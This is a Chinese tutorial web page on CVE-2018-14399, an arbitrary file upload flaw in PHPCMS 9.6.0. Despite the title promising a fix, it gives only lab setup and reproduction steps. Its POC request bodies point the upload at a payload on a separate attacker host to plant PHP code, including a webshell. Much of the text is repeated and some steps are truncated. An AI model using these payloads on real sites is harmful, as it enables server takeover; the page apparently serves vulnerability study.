您现在的位置是:首页 > cms教程 > phpcms教程phpcms教程
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)修复方法
亦玉2025-05-19phpcms教程已有人查阅
导读PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的
一、漏洞描述
PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。
二、漏洞影响版本
PHPCMS 9.6.0
三、漏洞环境搭建
1、 官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/
2、 解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问192.168.10.171/phpcms/install/install.php,开始安装
3、一直点击下一步,在”选择模块”这个环节,选择”全新安装PHPCMS V9”
4、然后一直下一步,在”账号设置”这一块填写数据库账号和密码以及设置管理员密码
5、然后一直下一步,直到出现如下界面,说面成功安装
6、登录后台,生成首页
四、漏洞复现
1、浏览器访问前台,注册一个会员
2、点击注册页面,抓包
3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息
4、构造POC
6、可以看到返回包的内容包含了上传文件的路径
7、浏览器访问
8、构造POC,上传一句话
POC内容:
10、可以看到返回包的内容包含了上传文件的路径
PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。
二、漏洞影响版本
PHPCMS 9.6.0
三、漏洞环境搭建
1、 官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/
2、 解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问192.168.10.171/phpcms/install/install.php,开始安装
3、一直点击下一步,在”选择模块”这个环节,选择”全新安装PHPCMS V9”
4、然后一直下一步,在”账号设置”这一块填写数据库账号和密码以及设置管理员密码
5、然后一直下一步,直到出现如下界面,说面成功安装
6、登录后台,生成首页
四、漏洞复现
1、浏览器访问前台,注册一个会员
2、点击注册页面,抓包
3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息
4、构造POC
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://192.168.10.153/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=
5、修改抓包内容,添加POC6、可以看到返回包的内容包含了上传文件的路径
7、浏览器访问
8、构造POC,上传一句话
POC内容:
siteid=1&modelid=11&username=testa&password=testa123&email=testa@163.com&info[content]=<img src=http://192.168.10.153/test.txt?.php#.jpg>&dosubmit=1&protocol=
9、修改数据包,添加POC,需要注意: 在repeater里测试go时每一次都要修改username,password和email字段值,保证不能重复。10、可以看到返回包的内容包含了上传文件的路径
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
相关教程
图文教程
phpcms数据库配置文件位置
phpcms数据库在“database.php”文件中进行配置,其查找方法是:首先打开网站源码文件,并找到源码文件中“caches”文件夹;然后找到“configs”文件夹;最后找到
phpcms文件目录结构分析介绍
刚刚接触phpcms,先从它的目录结构说起。是phpcms的主目录结构:其中api是接口目录,这个接口不是很明白。大概其是把别的内容加入进来
PHPCMS数据库备份与恢复的正确操作步骤流程
在phpcms中,数据库备份与恢复的步骤如下:1. 备份数据库:登录服务器,使用 mysqldump 命令备份到日期命名的文件。2. 恢复数据库:上传备份文件,使用MySQL命令恢复数据。
phpcms的php格式化时间戳写法示例
用PHPCMSV9建站时,经常会用到时间标签,它是通用标签调用-日期时间格式化,适用全站。一、日期时间格式化显示:二、PHP时间戳函数获取指定日期的unix时间戳
相关源码
-
自适应手机版五金机械阀门设备通用行业网站模板该PbootCMS内核开发的网站模板适用于阀门设备、五金机械类企业,通过更换文字图片也可快速适配其他工业领域。采用响应式设计,确保PC端与手机端数据同步,操作便捷,并附带测试数据。查看源码 -
(自适应)摄像头安防电子设备pbootcms源码下载本模板基于PbootCMS系统开发,为安防电子设备企业设计,特别适合监控摄像头、安防系统等产品的展示。采用响应式技术,确保各类设备参数和功能在不同终端上都能清晰呈现。查看源码 -
(自适应)居家生活日用品纸盘纸盒纸杯卫生纸巾生产厂家pbootcms模板为纸品生产企业打造的现代化展示平台,自动适应各种设备屏幕,确保浏览体验一致,完善的SEO功能,提升网站曝光度,基于PbootCMS构建,源码开放可定制。查看源码 -
(PC+WAP)蓝色玻璃纤维制品环保设备营销型pbootcms模板源码下载这是一款针对玻璃纤维行业特点设计的网站模板,采用蓝色系配色方案,体现工业感和环保理念。模板包含产品中心、应用案例、技术支持和新闻动态等核心模块,能够全面展示玻璃纤维制品的技术参数和应用场景。查看源码 -
pbootcms(自适应)SEO优化排名服务公司网站模板核心定位为SEO排名服务商打造的营销型网站框架,集成PbootCMS开源系统的高效管理能力与SEO最佳实践方案,助力企业快速建立专业的技术服务形象。查看源码 -
(自适应)中英双语配线器材扎带线卡网站pbootcms模板免费下载为线缆管理、电气配线领域打造的响应式网站模板,采用PbootCMS内核开发,可快速搭建企业级产品展示平台,数据实时同步管理。查看源码
| 分享笔记 (共有 篇笔记) |
